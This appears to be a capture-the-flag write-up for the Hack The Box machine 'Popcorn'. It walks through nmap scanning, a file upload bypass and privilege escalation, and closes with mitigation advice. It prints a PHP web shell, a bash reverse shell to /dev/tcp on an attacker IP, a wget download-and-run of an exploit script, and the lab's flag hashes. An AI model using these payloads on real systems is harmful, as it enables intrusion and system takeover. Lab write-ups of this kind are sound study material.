htb-writeups

Popcorn HTB Writeup

Executive Summary

This penetration test of the Popcorn HTB machine revealed critical security vulnerabilities leading to complete system compromise. The attack chain progressed from web application enumeration to remote code execution and privilege escalation.

Reconnaissance Phase

Network Scanning

Target Declaration:

export target=10.129.91.156

image

Comprehensive Port Discovery:

sudo nmap -p- --min-rate 5000 -sT -vvv $target

image

Service Enumeration:

sudo nmap -p 22,80 -sC -sV -T4 $target

image

DNS Configuration

Added hostname resolution for comprehensive web testing:

echo "10.129.91.156 popcorn.htb" | sudo tee -a /etc/hosts

image

Web Application Assessment

Initial Discovery

Visiting http://popcorn.htb revealed a default web application interface.

image

Directory Enumeration

Conducted thorough directory bruteforcing which uncovered several interesting endpoints.

image

Critical Findings

File Upload Functionality:

image

image

Initial Access

User Registration

Successfully registered a new account on the torrent application to gain access to upload functionality.

image

File Upload Bypass

  1. Torrent Upload: Initially uploaded a legitimate torrent file

image

image

  1. Image Upload Bypass:
    • Accessed the image editing feature

image

image

image

Remote Code Execution

Shell Upload:

<?php system($_GET['cmd']); ?>

image

Reverse Shell Execution:

# Attacker Listener
nc -nlvp 9001

# Web Trigger
http://popcorn.htb/torrent/upload/920dcb9268b2e20fbe0f0bd9a4de82188ce28033.php?cmd=bash%20-c%20%27sh%20-i%20%3E%26%20/dev/tcp/10.10.16.21/9001%200%3E%261%27

image

image

Shell Obtained:

image

Post-Exploitation

User Flag Discovery

find . -type f -ls
cat user.txt
475e864a3771cf836c78fa1f6ab4b8f2

image

Privilege Escalation

Vulnerability Identification:

image

Exploit Research:

image

Exploit Deployment:

# Host exploit on attacker machine
python3 -m http.server 8000

# Download and execute on target
wget http://10.10.16.21:8000/14339.sh
chmod +x 14339.sh

# Stabilize shell before execution
python -c "import pty;pty.spawn('/bin/bash')"
./14339.sh

image

Root Access Achieved

Successfully escalated privileges to root using the PAM MOTD vulnerability.

image

Root Flag Extraction:

image

cat /root/root.txt
5eddd59cc9633927984c39f001331eb2

Vulnerability Analysis

Critical Security Issues

  1. Insecure File Upload
    • No proper file type validation
    • Content-Type header manipulation possible
    • Executable files stored in web-accessible directory
  2. Privilege Escalation Vector
    • Outdated PAM version with known vulnerability
    • Improper MOTD configuration
    • Lack of security patches
  3. Access Control Failures
    • Weak upload restrictions
    • Insufficient input sanitization

Mitigation Recommendations

Immediate Actions

  1. File Upload Security
    • Implement strict file type verification
    • Use server-side MIME type detection
    • Store uploaded files outside web root
    • Implement antivirus scanning
  2. System Patching
    • Update PAM to latest secure version
    • Apply all security patches regularly
    • Implement automated patch management
  3. Network Security
    • Restrict file upload capabilities
    • Implement Web Application Firewall (WAF)
    • Conduct regular vulnerability assessments

Long-term Security Improvements

  1. Secure Development Practices
    • Input validation and sanitization
    • Principle of least privilege
    • Regular security code reviews
  2. Monitoring and Detection
    • File integrity monitoring
    • Intrusion detection systems
    • Comprehensive logging and alerting

Technical Indicators

Attack Timeline

  1. Network reconnaissance → 2. Web application enumeration → 3. Account registration → 4. File upload bypass → 5. Remote code execution → 6. Privilege escalation → 7. Root compromise

Tools Utilized

Exploit References